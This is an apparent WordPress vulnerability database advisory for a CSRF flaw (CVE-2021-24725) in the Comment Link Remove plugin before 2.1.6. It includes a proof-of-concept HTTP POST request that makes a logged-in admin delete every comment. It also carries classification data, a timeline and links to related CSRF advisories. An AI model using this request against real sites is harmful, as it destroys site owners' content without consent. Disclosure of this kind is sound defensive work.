WordPress Plugin Vulnerabilities

Comment Link Remove and Other Comment Tools < 2.1.6 - Arbitrary Comment Deletion via CSRF

Description

The plugin does not have CSRF check in its 'Delete comments easily', which could allow attackers to make logged in admin delete arbitrary comments

Proof of Concept

POST /wp-admin/admin.php?page=comment-link-remove HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Connection: keep-alive
Cookie: [admin+ cookies]
Upgrade-Insecure-Requests: 1

delAllCmts=delAllCmts

Affects Plugins

Plugin icon
comment-link-remove
Fixed in 2.1.6

References

CVE
CVE-2021-24725
URL
https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=29225

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
4.3 (medium)

Miscellaneous

Original Researcher
Martin Vierula of Trustwave
Verified
Yes
WPVDB ID
01483284-57f5-4ae9-b5f1-ae26b623571f

Timeline

Publicly Published
2021-08-23 (about 2 years ago)
Added
2021-08-23 (about 2 years ago)
Last Updated
2022-04-24 (about 1 years ago)

Other

Published
Title
Published
2023-11-14
Title
LayerSlider < 7.7.10 - Cross-Site Request Forgery
Published
2014-08-01
Title
LayerSlider 4.6.1 - Style Editing CSRF
Published
2023-04-13
Title
Shortlinks by Pretty Links < 3.4.1 - Link Visit Stats Clear via CSRF
Published
2022-02-23
Title
Amelia < 1.0.46 - Arbitrary Customer Deletion via CSRF
Published
2020-02-24
Title
Ultimate Membership Pro < 8.7 - Cross-Site Request Forgery allowing Arbitrary Account Deletion and Creation